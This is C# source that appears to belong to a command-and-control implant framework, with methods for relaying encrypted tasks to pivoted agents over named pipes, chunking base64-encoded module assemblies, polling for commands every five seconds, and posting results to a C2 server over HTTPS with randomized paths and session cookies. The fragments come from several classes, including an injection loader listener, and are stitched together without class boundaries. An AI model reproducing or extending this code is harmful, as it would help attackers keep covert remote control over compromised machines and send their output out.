//Send command to agent
//AES
public void ManageCommand(Utility.TaskMsg task)
{
string command_src = new JavaScriptSerializer().Serialize(task);
StringBuilder output = new StringBuilder();
try
{
//set agentid with agentpivot
byte[] bytes = Crypto.Aes.EncryptAesMessage(command_src, webaeskey, webaesiv);
pipe.Write(bytes, 0, bytes.Length);
output = ReadOutput();
wc.Add(new Cookie("sessionid", cookie, "/", host));
// Send output to server
string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]);
Utility.SendOutputHttp(task.Instanceid, output.ToString(), wc, webaeskey, webaesiv, rpaddress, param, AgentidRelayed, agentid);
}
catch (IOException e)
{
Console.WriteLine("Error during sendcommand agent will be removed {0}", e.Message);
//TODO remove agent from list
}
Console.WriteLine(output);
Console.WriteLine();
}
public CommandExecuter(Utility.TaskMsg task, NamedPipeClientStream pipe, Utility.CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string agentid, string processname)
{
this.task = task;
this.pipe = pipe;
this.wc = wc;
this.aeskey = aeskey;
this.aesiv = aesiv;
this.agentid = agentid;
this.processname = processname;
}
// Manage agentid request
public void Run()
{
ManageAgentIdRequest();
try
{
Utility.CheckInMsg msg = ManageCheckInMsg();
if (msg != null)
{
//Get checked in to server
//wait for command
do
{
try
{
//string rpaddress = String.Format("https://{0}:{1}/{2}", Program.host, Program.port, Program.pageget[new Random().Next(Program.pageget.Length)]);
//wc.Add(new Cookie("sessionid", cookie, "/", Program.host));
if (commands.ContainsKey(AgentId))
{
commands.TryGetValue(AgentId, out List <Utility.TaskMsg> list);
if (list.Count > 0)
{
//Received command from server
//Send command to agent and send back result to server
Utility.TaskMsg task = list.First();
list.Remove(task);
ManageCommand(task);
}
}
}
catch (Exception)
{
}
Thread.Sleep(5000);
} while (true);
}
}
catch (Exception e)
{
Console.WriteLine("[x] Error during checkin agentid {0}", agentid);
Console.WriteLine("[x] {0}", e.Message);
}
}
private void SendCommand(NamedPipeServerStream pipe, Utility.TaskMsg task)
{
try
{
if (task.ModuleTask.Assembly.Length > 2048)
{
int achunksize = 1024;
Utility.TaskMsg ctask = new Utility.TaskMsg
{
TaskType = task.TaskType,
Agentid = task.Agentid,
AgentPivot = task.AgentPivot,
Chunked = true
};
string assembly = task.ModuleTask.Assembly;
//Chunnk number
int chunks = assembly.Length / achunksize;
if (assembly.Length % achunksize != 0)
{
chunks++;
}
ctask.ChunkNumber = chunks;
Utility.ModuleConfig cmodconf = new Utility.ModuleConfig
{
Method = task.ModuleTask.Method,
Moduleclass = task.ModuleTask.Moduleclass,
Parameters = task.ModuleTask.Parameters
};
int iter = 0;
do
{
//Console.WriteLine("Sendcommand iter " + iter);
int remaining = assembly.Length - (iter * achunksize);
if (remaining > achunksize)
{
remaining = achunksize;
}
cmodconf.Assembly = assembly.Substring(iter * achunksize, remaining);
ctask.ModuleTask = cmodconf;
string responsechunkmsg = new JavaScriptSerializer().Serialize(ctask);
//Console.WriteLine("Sendcommand responsechunkmsg " + responsechunkmsg);
byte[] responsechunkmsgbyte = Encoding.Default.GetBytes(responsechunkmsg);
var responsechunk = Encoding.Default.GetBytes(Convert.ToBase64String(responsechunkmsgbyte));
pipe.Write(responsechunk, 0, responsechunk.Length);
iter++;
}while (chunks > iter);
}
else
{
task.Chunked = false;
string command_src = new JavaScriptSerializer().Serialize(task);
byte[] taskbyte = Encoding.Default.GetBytes(command_src);
string taskb64 = Convert.ToBase64String(taskbyte);
pipe.Write(Encoding.Default.GetBytes(taskb64), 0, Encoding.Default.GetBytes(taskb64).Length);
}
Console.WriteLine("End sendcommand");
}
catch (Exception e)
{
Console.WriteLine("Error during sendcommand {0}", e.Message);
}
}
public InjectionLoaderListener(string pipename, Utility.TaskMsg command)
{
this.pipename = pipename;
this.command = command;
}